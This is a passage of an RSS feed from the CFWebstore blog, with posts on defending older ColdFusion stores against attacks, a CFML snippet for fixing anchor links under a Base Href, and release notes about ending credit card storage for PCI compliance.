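Because the comparison is built from the store directory plus each allowed name and tested against GetBaseTemplatePath(), a file uploaded to something like images/uploads/go.cfm is rejected even though its file name is on the list; only the exact paths under the store root pass. If your store is not in the webroot, change the cflocation target the same way as for the code above.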
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Tue, 30 Jun 2009 18:24:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/6/30/A-Code-Snippet-to-Help-Protect-Against-Attacks</guid>
				
			</item>
			
			<item>
				<title>Latest Hack Attempts</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/6/25/Latest-Hack-Attempts</link>
				<description>
				
				More details have come out about the latest attack; this is a new one that is quite insidious. If you have a recent install you would not be vulnerable (although upgrading to the latest release is still recommended), but any store more than a year old may need quick patching. Contact me directly or visit the &lt;a href=&quot;http://groups.yahoo.com/group/cfwebstore5/&quot;&gt;CFWebstore email list&lt;/a&gt; for more details on how to patch your specific version and tips on other things you can do to keep sites secure. 
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Thu, 25 Jun 2009 10:35:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/6/25/Latest-Hack-Attempts</guid>
				
			</item>
			
			<item>
				<title>New Rash of Attacks Against ColdFusion</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/6/22/New-Rash-of-Attacks-Against-ColdFusion</link>
				<description>
				
				It seems the hackers are making the rounds against ColdFusion sites again, so if you are using an older CFWebstore version be aware that you may be vulnerable. I&apos;ve posted about some of the issues in the past and included some code that can at least provide some level of protection. If you&apos;ve not considered upgrading before, now might be the time, as only by staying current with new releases can you be sure to have the most secure store possible. 

Read the previous entry here: &lt;br/&gt;

&lt;a href=&quot;http://blog.cfwebstore.com/index.cfm/2008/7/22/Some-Important-CFWebstore-Issues&quot;&gt;Some Important CFWebstore Issues&lt;/a&gt; 
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Mon, 22 Jun 2009 07:51:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/6/22/New-Rash-of-Attacks-Against-ColdFusion</guid>
				
			</item>
			
			<item>
				<title>Using Anchor Links with CFWebstore</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/3/26/Using-Anchor-Links-with-CFWebstore</link>
				<description>
				
				Here&apos;s a topic that came up on the email list this week. It definitely trips a lot of people up, so I thought it&apos;d be worth putting on the blog for others that might run up against it. 

In order to do the search-engine-safe URLs, CFWebstore puts a Base Href into the page. However, the browser resolves a bare fragment link such as href=&quot;#top&quot; relative to the Base Href rather than the page you are on, so anchor links on a page are thrown off by it and often won&apos;t work as a result. 

CFWebstore helps out by also providing a variable that is automatically set to the URL of the page you are on: Request.CurrentURL. You can use this in the code anytime you need to create links referring to the current page. In the case of the anchors, we need to make sure the anchor links have this URL inserted in front of them. If you are using the anchors somewhere in the code, you can just insert this variable in front of them. 

But what if you want to create something like a table of contents inside the content of a page? Since we can&apos;t use ColdFusion variables inside the page content (see related content below for more information on this), we just need to update the code that outputs the page content and have it insert the URL for us. The page content is output by the customtags/put_text.cfm file, so we just need to insert this line of code around line 37 of that file (in a CFML string, ## is a literal # sign, so the first argument matches an href that starts with #, and the second writes the current URL followed by a literal #):

&lt;code&gt;&lt;cfset Text = ReplaceNoCase(Text, &apos;&lt;a href=&quot;##&apos;, &apos;&lt;a href=&quot;#request.currentURL###&apos;, &apos;ALL&apos;)&gt;&lt;/code&gt;

Now all the anchor links will have the full URL on them. 
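As an added example (not the put_text.cfm code itself), here is the same rewrite as a reusable function that also handles single-quoted href attributes and spaces around the equals sign, which the one-liner above does not. The function name absolutizeAnchors is chosen here, and Request.CurrentURL is assumed to be set by CFWebstore as described above:

```cfml
&lt;!--- Added example, not the put_text.cfm code itself: the same rewrite as a reusable function
      that also handles href=&apos;#id&apos; and spaces around the equals sign. The function name is
      chosen here; Request.CurrentURL is assumed to be set by CFWebstore as described above. ---&gt;
&lt;cffunction name=&quot;absolutizeAnchors&quot; returntype=&quot;string&quot; output=&quot;false&quot;&gt;
    &lt;cfargument name=&quot;html&quot; type=&quot;string&quot; required=&quot;true&quot;&gt;
    &lt;cfargument name=&quot;currentURL&quot; type=&quot;string&quot; required=&quot;true&quot;&gt;
    &lt;!--- Pattern: href, optional whitespace, =, optional whitespace, a quote, then a literal #.
          \1 keeps the opening quote. Inside a double-quoted CFML string, &quot;&quot; is a literal quote
          and ## is a literal # sign; #arguments.currentURL# is interpolated. ---&gt;
    &lt;cfreturn REReplaceNoCase(arguments.html,
        &quot;(href\s*=\s*[&quot;&quot;&apos;])##&quot;,
        &quot;\1#arguments.currentURL###&quot;,
        &quot;ALL&quot;)&gt;
&lt;/cffunction&gt;

&lt;!--- Then, where the single cfset in put_text.cfm goes: ---&gt;
&lt;cfset Text = absolutizeAnchors(Text, request.currentURL)&gt;
```

Links that already carry a URL before the # (for example href=&quot;/page.cfm#top&quot;) are left alone, because the pattern only matches when the # immediately follows the opening quote.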
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Thu, 26 Mar 2009 14:16:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/3/26/Using-Anchor-Links-with-CFWebstore</guid>
				
			</item>
			
			<item>
				<title>Upcoming Releases</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/3/3/Upcoming-Releases</link>
				<description>
				
				My next release kept growing, and I have been getting so many good ideas for nice features to add to it that I decided it would be best to split it up: release some of the changes as soon as possible, so you have them sooner rather than later, and then do the bigger release, with all the additional database changes and new features, a little later this year, hopefully still by the end of Spring, depending on how much I decide to include in it. So you&apos;ll be seeing a version 6 update within the next week with some of the more important updates, and then version 7 later this year. 

Of particular note is that this update will not allow any storing of credit card data at all out of the box. I looked at trying to improve the encryption and other security measures to allow this, but there is so much more required under the PCI compliance rules that I can&apos;t handle at a software level, and from past experience I know most people won&apos;t bother to do it, putting both their customers and themselves at risk, so it really is not something I can leave as an option in the software. So if you need to be able to do additional transactions on credit cards (including recurring billing for memberships), you will need to use a processor like Shift4 that uses tokens instead of storing card data. I may look at using recurring billing APIs such as the one Authorize.Net has in the future, but these APIs do not offer as much flexibility and many features would not work with them, so they are a bit harder to support. 

If you have questions or concerns about updating to the new release and how this will affect your own store, please feel free to contact me. 
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Tue, 03 Mar 2009 13:30:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/3/3/Upcoming-Releases</guid>
				
			</item>
			</channel></rss>
